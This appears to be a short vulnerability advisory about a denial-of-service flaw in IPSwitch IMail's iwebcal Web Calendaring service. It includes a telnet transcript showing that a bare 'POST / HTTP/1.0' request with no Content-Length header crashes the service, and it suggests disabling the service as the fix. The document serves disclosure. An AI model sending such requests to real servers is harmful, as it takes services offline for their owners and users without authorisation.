COMMAND

	IMail Web Calendaring service crash using malformed POST request

SYSTEMS AFFECTED

	IPSwitch IMail, All Current Versions

PROBLEM

	In 2c79cbe14ac7d0b8472d3f129fa1df55 Security Advisory #6:
	

	the IMail Web Calendaring service, iwebcal, can be crashed by issuing  a
	malformed POST request.. specifically one that  neglects  to  include  a
	"Content-Length:" parameter
	

	

	xxx@xx:~$ telnet 192.168.0.2 8484

	Trying 192.168.0.2...

	Connected to 192.168.0.2.

	Escape character is '^]'.

	POST / HTTP/1.0

	

	Connection closed by foreign host.

	

	

	[the iwebcal service has crashed]
	

	

	xxx@xx:~$ telnet 192.168.0.2 8484

	Trying 192.168.0.2...

	telnet: connect to address 192.168.0.2: Connection refused

	

	

	#EXPLOITATION
	

	this is pretty obvious, it's a simple DoS.. and it looks  as  if  remote
	code execution is not possible due to the  nature  of  this  programming
	error
	

	

SOLUTION

	#PATCH
	

	sorry, no backdoors this time.. disable the service before someone  else
	does? or wait for a vendor patch after a few hoaxes are debunked..